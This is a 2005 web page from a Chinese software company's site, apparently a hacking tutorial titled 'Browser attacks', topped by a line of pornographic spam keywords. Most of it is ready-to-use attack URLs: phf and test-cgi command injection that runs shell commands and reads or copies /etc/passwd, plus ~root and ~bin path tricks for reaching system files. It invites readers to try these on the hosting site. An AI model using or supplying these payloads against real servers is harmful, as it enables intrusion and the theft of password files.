精品国产亚洲一区二区三区,男女作爱在线观看免费网站,欧美的又大又长做禁片A片,97国产精品人妻无码久久久
注冊
|
提交需求
|
訂閱
|
English
首 頁
解決方案
產(chǎn) 品
服 務(wù)
支 持
EDN系統(tǒng)
成功案例
關(guān)于我們
聯(lián)系我們
樹結(jié)構(gòu)圖
EDN系統(tǒng)
圖形圖像
網(wǎng)絡(luò)安全
項目專題
WEB開發(fā)
辦公系列
操作系統(tǒng)
數(shù)據(jù)庫
程序設(shè)計
TOP 10
在Foxmail中如何使…
Ftp 子命令
BigDecimal
MSN在線客服功能模塊使…
會員卡使用方法說明
DataInputStr…
留言板功能說明
CScript
BufferedInpu…
設(shè)置打印機
您現(xiàn)在的位置:
>
技術(shù)沙龍
>
網(wǎng)絡(luò)安全
>
黑客攻防
>
瀏覽器攻擊
相關(guān)軟件
>
瀏覽器攻擊
創(chuàng)建者:
webmaster
更新時間:
2005-05-27
19:32
在本章我將講述一些利用瀏覽器來進行攻擊的方法
1。大家都知道了phf攻擊了,phf是cgi script,很多站點都有這個大漏洞啦,使用
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以
拿到那個站點的passwd.但還有些更好的執(zhí)行方法呦如:
http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna
me=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=
haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd
%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/~someuser/passwd
http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname
=haqr&Qemail=&Qnickname=&Qoffice_phone=
上面執(zhí)行的命令是
id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
rm ~someuser/passwd
2。有關(guān)test攻擊
http://thegnome.com/cgi-bin/test-cgi?\whatever
服務(wù)器會應(yīng)答,本服務(wù)器的一些情況如:
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
好吧,讓我們來點趕興趣的
http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
3。~的應(yīng)用
~主要是用在很多的個人主頁上的快捷目錄的方法,如果我們使用這樣的~
http://thegnome.com/~root
http://thegnome.com/~root/etc/passwd
不是在任何平臺上都通過呦,在BSD Apache上曾經(jīng)成功過,當然還可以試試~bin ,~etc,~uucp.....
看到這個站點了嗎,本站所在的這個站點就是用這種形式的,如果我們打入 本站所在的web地址/~bin
出現(xiàn)了什么,你看到了嗎?然后...............注意請不要破壞
相關(guān)文章
前一則:
命令行下安裝的SERV-U
后一則:
計算機病毒基本概念
本頁查看次數(shù):
公司公告
|
客戶調(diào)查
|
法律聲明
|
誠聘英才
|
給我們投稿
|
繁
閃
頭像
京ICP備05031245號
Copyright @ REDCOME.com ALL Rights Reserved
北京怡康軟件科技有限公司 地址:北京市昌平區(qū)東小口立湯路188號北方明珠大廈1號樓2708 郵編:102218 電話:84909966 傳真:84909900 QQ:335601661